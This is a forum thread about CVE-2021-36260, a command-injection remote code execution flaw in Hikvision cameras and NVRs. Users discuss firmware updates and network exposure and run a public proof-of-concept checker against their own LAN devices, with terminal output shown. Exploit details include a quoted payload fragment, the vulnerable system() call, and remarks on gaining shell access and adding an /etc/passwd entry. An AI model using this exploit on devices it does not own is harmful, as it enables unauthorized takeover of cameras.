Unauthenticated Remote Code Execution (RCE) vulnerability in Hikvision IP camera/NVR firmware (CVE-2021-36260)

[watchful_ip]

Yes.

 

[username]

Adding my thanks to the great work on finding this vulnerability. One thing that has always bugged me is that I can never figure out which firmware updates to apply (USA equipment) from 2016.

My NVR is DS-716NI-SP (16 port). The effected lists here do not have a '-SP'. My cameras are 2cd2142fwd-i. Because of the confusion (and fear of bricking) I have not updated in some time and my intermittent searches have not indicated that updates exist for this older hardware.
My NVR is at V3.4.5 build 170518, and cameras are at V5.5.82 build 190220

Can anyone give me an idea if I need to update and specifically which file?

 

[username]

Failed to mention in prior post that my NVR is on connected to internet except for NTP. The cameras also do not see the internet.

 

[watchful_ip]

FYI Hikvision USA updated their advisory with direct links to the firmware update files.

updated firmware links

 

[username]

Thanks for the updated link. My hardware is not on that list , it seems to apply to newer hardware than I have.
I earlier posted a typo for my NVR. It's a DS-7716NI-SP (16 port), circa 2015, not a 716NI

The posted link also points to a FAQ which offered me useful info, including the fact that since it's not port forwarded and inside a LAN protected with a firewall appliance my risks are very low.

 

[watchful_ip]

That's true.

And for anyone still unclear - to quote from the FAQ:

To exploit this vulnerability, an attacker must be on the same network as the vulnerable device. In other words, if the attacker is able to view the log in screen of a vulnerable device, they could attack it.

If they cannot get to the login screen of a vulnerable device, they are not able to exploit the vulnerability

 

[bashis]

You can verify your cams now, PoC here

 

[Spirch]

i didnt try on my camera but this code ... you sure this is an unintentional bug?

but wow

 

[bashis]

i didnt try on my camera but this code ... you sure this is an unintentional bug?

but wow

Well, you cannot be sure about anything really, but my gut-feeling this is not intentional - however, maybe this is how it supposed to be, who really knows ?
Anyhow, I've checked a "fixed" version, and there are filtering now, still the URI and "language" tags are there, for what purpose - I really don't know.

Still, very interesting vulnerability, and extremely convenient one for performing additional researches.

 

[alastairstevenson]

you sure this is an unintentional bug?

Read the explanations linked to in post #1 that covers this.

 

[Spirch]

Read the explanations linked to in post #1 that covers this.

i read everything

this kind of bug is something that a beginner / coop student would make and the fact that (if there is any team) QA and code reviewer didnt catch that is weird

all the stars were aligned

 

[bashis]

i read everything

this kind of bug is something that a beginner / coop student would make and the fact that (if there is any team) QA and code reviewer didnt catch that is weird

all the stars were aligned

I have seen this kind of bugs a lot, more times than I can remember...

All falls down on one stupid 'system()' call.

'system()' should never have any kind of user provided input, (filtered or not) period.

 

[bashis]

I have seen this kind of bugs a lot, more times than I can remember...

All falls down on one stupid 'system()' call.

'system()' should never have any kind of user provided input, (filtered or not) period.

Anyhow, thanks to @watchful_ip report, it were quite obvious it was 'system()' involved, and limited command injection (as per his/her PoC of /etc/passwd), pretty easy to find the 'system()' call with user provided input (actually only one candidate what I saw), little searching with what URI, and then some additional searching for right XML tag (thanks Hik, for your debug note), then test it with 'reboot()' to confirm.

 

[username]

You can verify your cams now, PoC here

This didn't work using an iMac. Later I'll fire up my linux machine and try again. Admittedly I'm not proficient in this sort of stuff and additionally may have incorrectly installed Python3 on my Mac.
I named the file hikvision.py rather than the name presented at GitHub.
Python3 hikvision.py --rhost 192.168.x.x --rport8080 --check

Traceback (most recent call last):

File "hikvision.py", line 66, in <module>

import requests

ModuleNotFoundError: No module named 'requests'

 

[SamM]

This didn't work using an iMac. Later I'll fire up my linux machine and try again. Admittedly I'm not proficient in this sort of stuff and additionally may have incorrectly installed Python3 on my Mac.
I named the file hikvision.py rather than the name presented at GitHub.
Python3 hikvision.py --rhost 192.168.x.x --rport8080 --check

Traceback (most recent call last):

File "hikvision.py", line 66, in <module>

import requests

ModuleNotFoundError: No module named 'requests'

open terminal window
then run "pip install requests"

This should solve it on your mac

 

[username]

Thanks. Result is "cannot establish connection".

As expected, all is good.

 

[alastairstevenson]

That suggests a network address mismatch.
What are the IP addresses of the camera and computer?

 

[alastairstevenson]

Thanks. Result is "cannot establish connection".

As expected, all is good.

I suspect that you have a network connectivity issue with the target.

Below is a worked example of the PoC tool operating.

In the first attempt at the 192.168.1.64 target, the camera is powered off, so there is the error 'Cannot establish connection ...'
In the remaining 3 tests, the targets are live.

alastair@PC-I5 ~/coding_stuff/bashis_disclosures $ ./Hikvision_CVE-2021-36260_RCE_POC.py --rhost 192.168.1.64  --check
[*] Hikvision CVE-2021-36260
[*] PoC by bashis <mcw noemail eu> (2021)
[*] Checking remote "192.168.1.64:80"
[-] Cannot establish connection to "192.168.1.64:80"
alastair@PC-I5 ~/coding_stuff/bashis_disclosures $
alastair@PC-I5 ~/coding_stuff/bashis_disclosures $ ./Hikvision_CVE-2021-36260_RCE_POC.py --rhost 192.168.1.112  --check
[*] Hikvision CVE-2021-36260
[*] PoC by bashis <mcw noemail eu> (2021)
[*] Checking remote "192.168.1.112:80"
[i] ETag: "e69-258-601f845c"
[!] Remote is verified exploitable
alastair@PC-I5 ~/coding_stuff/bashis_disclosures $
alastair@PC-I5 ~/coding_stuff/bashis_disclosures $ ./Hikvision_CVE-2021-36260_RCE_POC.py --rhost 192.168.1.111  --check
[*] Hikvision CVE-2021-36260
[*] PoC by bashis <mcw noemail eu> (2021)
[*] Checking remote "192.168.1.111:80"
[i] ETag: "468-258-5e6f4e77"
[-] Could not verify if vulnerable (Code: 500)
alastair@PC-I5 ~/coding_stuff/bashis_disclosures $ ./Hikvision_CVE-2021-36260_RCE_POC.py --rhost 192.168.1.64  --check
[*] Hikvision CVE-2021-36260
[*] PoC by bashis <mcw noemail eu> (2021)
[*] Checking remote "192.168.1.64:80"
[i] ETag: "306-258-5e17dd7b"
[-] Could not verify if vulnerable (Code: 500)
alastair@PC-I5 ~/coding_stuff/bashis_disclosures $

 

[rearanger]

The python script does not let me logon to shell after the first attempt. Had to alter the script to get it to let me login to shell repeatedly.

Not played with it much yet lol

Well done @bashis

 

[bashis]

The python script does not let me logon to shell after the first attempt. Had to alter the script to get it to let me login to shell repeatedly.

Would be interesting to know why, but I guess you comment out "remote.send(query_args='cat N>webLib/N')" ?
(I put the whole 'already pwn' check there to not have multiple same entry in (my) /etc/passwd)